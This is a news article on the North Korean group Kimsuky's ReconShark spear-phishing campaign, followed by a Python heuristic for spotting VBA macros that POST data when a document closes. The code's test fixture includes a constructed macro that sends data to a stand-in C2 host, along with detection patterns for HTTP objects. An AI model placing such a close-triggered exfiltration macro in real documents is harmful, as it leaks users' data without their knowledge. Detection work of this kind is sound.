Global spear-phishing campaign launched by North Korean APT Kimsuky

May 05, 2023, Hi-network.com

Kimsuky, a North Korean state-sponsored APT group, has deployed a new malware component called ReconShark, according to security researchers at SentinelOne. This malware is being distributed via targeted spear-phishing emails containing OneDrive links that download documents and activate malicious macros. 

The Microsoft Office macro, triggered when the document closes, performs a more advanced version of the reconnaissance function found in Kimsuky's BabyShark malware, which stores data in string variables that it sends to a C2 (command and control) server via an HTTP POST request. ReconShark can also install additional payloads, such as scripts or DLL files, based on the detection mechanism processes found on infected machines. The campaign targeted organisations and individuals in at least the USA, Europe and Asia, including think tanks, research universities and government agencies.
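
A triage heuristic for the behaviour described above, as an added example that is not from the original article or from SentinelOne's report: it flags extracted VBA source that pairs a document-close handler with an HTTP POST. It assumes the macro source has already been extracted as text; the sample macros, the `example.invalid` URLs and the function names are constructed for illustration.

```python
import re

# Procedures Word runs automatically when a document is closed.
CLOSE_SUB = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?Sub\s+(AutoClose|Document_Close)\b",
    re.IGNORECASE | re.MULTILINE)
# COM ProgIDs commonly used from VBA to send HTTP requests.
HTTP_OBJ = re.compile(r"(?:MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|"
                      r"WinHttp\.WinHttpRequest)[\w.]*", re.IGNORECASE)
POST_OPEN = re.compile(r"\.Open\s*\(?\s*\"POST\"", re.IGNORECASE)

def strip_comments(source):
    """Drop VBA comments ('...) so commented-out code is not matched."""
    out = []
    for line in source.splitlines():
        in_str, kept = False, []
        for ch in line:
            if ch == '"':
                in_str = not in_str      # "" inside a string toggles twice
            elif ch == "'" and not in_str:
                break                    # rest of the line is a comment
            kept.append(ch)
        out.append("".join(kept))
    return "\n".join(out)

def triage_macro(source):
    """Return indicators and a verdict for one module of extracted VBA."""
    code = strip_comments(source)
    handlers = [m.group(1) for m in CLOSE_SUB.finditer(code)]
    http = sorted({m.group(0) for m in HTTP_OBJ.finditer(code)})
    posts = bool(POST_OPEN.search(code))
    verdict = "review" if handlers and http and posts else "no-match"
    return {"close_handlers": handlers, "http_objects": http,
            "http_post": posts, "verdict": verdict}

# Constructed samples (not taken from any real document).
SUSPECT = '''Private Sub Document_Close()
    Dim body As String
    body = "placeholder"
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "POST", "http://c2.example.invalid/", False
    req.send body
End Sub'''
BENIGN = '''Sub AutoClose()
    ' req.Open "POST", "http://example.invalid/", False
    ActiveDocument.Save
End Sub'''

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, triage_macro(src))
```

A "review" verdict is a prompt for analyst inspection, not a classification: legitimate templates also use close handlers, and obfuscated macros will not match these patterns.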
